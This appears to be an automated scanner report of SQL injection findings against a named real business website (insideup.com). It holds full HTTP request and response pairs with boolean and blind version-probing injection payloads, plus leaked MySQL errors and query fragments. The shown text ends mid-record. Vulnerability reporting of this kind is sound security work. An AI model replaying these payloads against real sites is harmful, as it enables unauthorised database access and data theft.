<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.insideup.com/ppc/leadflow/"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
<script language="javascript" src="js/dhtmlwindow.js"></script> <script language="javascript" src="js/modal.js"></script> <script type="text/javascript" src="js/application_js.js"></script> <link href="css/styles.css" rel="stylesheet" type="text/css" /> <script> function frmprompt(){ frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0') } function frmprompt02(){ frmwindow=dhtmlmodal.open('frmbox', 'd ...[SNIP]...
Request 2
GET /ppc/leadflow/cace00/project.php16588561'%20or%201%3d2--%20?catId=-80007%27OR%201=1%20AND%20ASC(MID((Now()),1,1))=1&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1c3cvok1u33r0dee2ljf5jrgi4; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:15:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 125 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php16588561' or 1=2-- was not found on this server.</p>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php'?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:10:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=o9ah0i0u6ojlaivqg7elrl6bb1; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php''?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:10:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ng96uq9hof4hqa0a1mtlvsepu3; path=/ Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php'' was not found on this server.</p>
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payloads 12216678'%20or%201%3d1--%20 and 12216678'%20or%201%3d2--%20 were each submitted in the attributeId_342_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:37:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ps96pg77vvb674d2qahu1f1tr7; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1928__Take sales orders&attributeId_394=1939__Not sure&attributeId_395=1947__' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:08:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=tg8ljpqprdsp78ulp52i9hf7v4; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. The payloads 27466083'%20or%201%3d1--%20 and 27466083'%20or%201%3d2--%20 were each submitted in the attributeId_343_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:40:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=kumt6hp8m5ki2ikj9td0hovjm1; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1928__Take sales orders&attributeId_394=1939__Not sure&attributeId_395=1947__' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:08:53 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8fltnbfqh1olelq6aq72p8lvt5; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payloads 58917606'%20or%201%3d1--%20 and 58917606'%20or%201%3d2--%20 were each submitted in the attributeId_344_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:40:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_393%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payloads 13891904'%20or%201%3d1--%20 and 13891904'%20or%201%3d2--%20 were each submitted in the attributeId_393%5B%5D parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:42:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_393%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_393%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders'&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:56 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ip76n259e5ijao3799t7t9g384; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated 24-hour&attribut' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders''&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:08:57 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6dlublmqcth6r1eu99d68lfhe1; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The attributeId_394 parameter appears to be vulnerable to SQL injection attacks. The payloads 17633392'%20or%201%3d1--%20 and 17633392'%20or%201%3d2--%20 were each submitted in the attributeId_394 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:42:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_394 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_394 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
